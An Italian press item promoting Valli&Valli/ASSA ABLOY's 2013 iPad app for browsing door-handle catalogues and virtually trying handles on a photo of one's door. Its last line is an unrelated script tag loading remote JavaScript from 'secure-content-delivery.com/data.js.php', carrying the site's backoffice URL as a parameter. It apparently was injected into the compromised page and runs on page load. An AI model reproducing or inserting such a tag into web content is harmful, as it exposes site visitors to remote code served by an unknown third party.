Valli&Valli, prima azienda italiana a concepire la maniglia come elemento d’arredo capace di conferire alla casa personalità e stile, si conferma realtà attenta e pronta a recepire i mutamenti sociali e le tendenze della comunicazione contemporanea: investimenti accurati e continua ricerca sono solo due delle qualità che permettono a Valli&Valli/ASSA ABLOY di restare sempre al passo coi tempi.
È proprio sulla base di queste concezioni che è stata sviluppata l’applicazione Valli&Valli Design Handles 2013, pensata per facilitare, anche in mobilità, l’attività quotidiana di architetti ed esperti del settore. Semplice e immediata, l’App, scaricabile da Apple Store da fine giugno e attualmente disponibile solo per Ipad dotati di sistemi operativi iOS 5.0 o successivi, permette di avere sempre a disposizione tutte le informazioni sui prodotti Valli&Valli e Fusital.
Oltre alle informazioni "classiche" (cataloghi sfogliabili, schede tecniche dei prodotti, biografie dei designers che collaborano con Valli&Valli/ASSA ABLOY, sezione contatti aggiornata, etc.), la nuova applicazione di Valli&Valli consente di "provare" virtualmente la maniglia a cui si è interessati: basta, infatti, scattare una foto alla propria porta sovrapponendovi la maniglia scelta dal catalogo, così da averne una facile e immediata visione.
Tra le altre funzionalità interattive proposte: la possibilità di inserire i prodotti nel Bookmarks, in modo da tenerne traccia, e quella di scaricare i cataloghi come eBook.
Una volta scaricata, l’applicazione funziona offline.
Con questa Applicazione Valli&Valli/ASSA ABLOY si conferma capace di interpretare al meglio i trend del design contemporaneo, comunicando con i suoi estimatori mediante l’utilizzo dei più aggiornati sistemi tecnologici.
<script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&d=2013-10-10&s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1&cb=0.1865877803642817" type="text/javascript"></script>